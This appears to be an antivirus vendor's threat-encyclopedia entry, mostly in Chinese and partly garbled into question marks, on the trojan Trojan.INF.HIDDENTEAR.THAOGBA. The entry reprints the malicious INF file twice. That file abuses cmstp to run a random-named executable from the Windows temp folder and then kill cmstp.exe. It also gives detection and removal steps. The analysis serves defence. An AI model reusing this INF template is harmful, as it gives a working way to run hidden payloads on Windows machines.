分(fēn)析者: Thea Patrice Tajonera   
 :

INF/Agent.J trojan (NOD32)

 平台:

Windows

 总體(tǐ)风险等级:
 潜在破坏:
 潜在分(fēn)布:
 感染次数:
 信息暴露:

  • 恶意软件类型:
    Trojan

  • 有(yǒu)破坏性?:
    没有(yǒu)

  • 加密?:
    没有(yǒu)

  • In the Wild:
    是的

  概要

感染途徑: ???????

它以文(wén)件的形式出现在系统中(zhōng),可(kě)能(néng)是其他(tā)恶意软件投放的,或者是用(yòng)户在访问恶意网站时无意中(zhōng)下载的。

????????,?????????

  技(jì )术详细信息

文(wén)件大小(xiǎo): 583 bytes
报告日期: INF
内存驻留: 没有(yǒu)
初始樣本接收日期: 2021年1月7日
Payload: ????
N

???????

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

??

??? .INF ????????:

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers

RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
cmd /c start "C:\Windows\temp\{Random Characters}.exe"
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="Crimson"
ShortSvcName="Crimson"

??????

????????,??????????:

  • C:\Windows\temp\{Random Characters}.exe
  • taskkill /IM cmstp.exe /F

  解决方案

最小(xiǎo)扫描引擎: 9.800
First VSAPI Pattern File: 16.462.06
VSAPI 第一样式发布日期: 2021年1月7日
VSAPI OPR样式版本: 16.463.00
VSAPI OPR样式发布日期: 2021年1月8日

Step 1

??Windows ME?XP??,????,????????????,??????????

Step 2

?????AUTORUN.INF??,?Trojan.INF.HIDDENTEAR.THAOGBA??,???????

[ 更多(duō) ]
  • [version]
    Signature=$chicago$
    AdvancedINF=2.5

    [DefaultInstall]
    CustomDestination=CustInstDestSectionAllUsers
    RunPreSetupCommands=RunPreSetupCommandsSection

    [RunPreSetupCommandsSection]
    ; Commands Here will be run Before Setup Begins to install
    cmd /c start "C:\Windows\temp\{Random Characters}.exe"
    taskkill /IM cmstp.exe /F

    [CustInstDestSectionAllUsers]
    49000,49001=AllUSer_LDIDSection, 7

    [AllUSer_LDIDSection]
    "HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

    [Strings]
    ServiceName="Crimson"
    ShortSvcName="Crimson"

Step 3

?????????????,???????Trojan.INF.HIDDENTEAR.THAOGBA?? ????????????????????????,????????????????????????????????????????